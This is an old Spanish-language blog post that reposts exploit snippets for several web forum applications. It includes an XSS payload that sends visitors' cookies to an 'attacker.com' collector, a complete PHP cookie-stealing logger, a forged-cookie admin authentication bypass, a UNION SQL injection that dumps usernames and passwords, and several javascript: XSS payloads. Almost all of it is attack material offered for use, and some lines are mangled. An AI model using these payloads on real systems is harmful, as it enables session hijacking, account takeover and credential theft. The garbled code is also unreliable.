ecoestadistica.com

domingo, enero 08, 2006

Vulnerabilidades en Aplicaciones...

Xoops Pool Module IMG Tag XSS

Introduce en un post este codigo:
< img src = " javascript:window.navigate%28"('hxxp://attacker.com/cookies.php? c=" +document.cook ie);"

y dentro de ¨cookies.php¨, ingresa lo siguiente:

/ ?
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?
-----------------------------------------------------------

NavBoard BBcode XSS

Ejemplo de BBcode:

Para V16(2.6.0)
[b] <> [/b]
[textlarge] < XSS > [/textlarge]

Para V16(2.6.0) y V17beta2
[url=javascript:alert(123)]title[/url]

------------------------------------------------------------

427BB Multiple Vulnerabilities

427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS)

1. Autentificacion bypass usando valores de cookie modificadas.

Cookie: username=admin;
Cookie: authenticated=1;
Cookie: usertype=admin;

2. Ejemplo de SQL Injection.

Tiene que estar conectado como el usuario registrado.
http://host/bb427/showthread.php? ForumID=999% 20union%20select% 20UserName, Passwrod,null, null%20from% 20prefPersonal

3. Insercion de codigo script arbitrario.

postee un nuevo mensaje:.
Message text:
[url=javascript:alert(123)]clickme[/url]

------------------------------------------------------------

Proyecto Domus 'email' XSS

Ejemplo de URL:
http://host/domus/escribir.php? domus=ae29cf4d3f2dc42241e387d39b4126e2&hilo=1&amp;amp;padre=1&categoria=General&n=&usario=username&email=e@\';% 20alert(123);% 20var%20dss=\'h.co&asunto=blabla&amp;texto=anytext&accion=enviar

Fuente:hackers-news.com

Salu2



ecoestadistica.com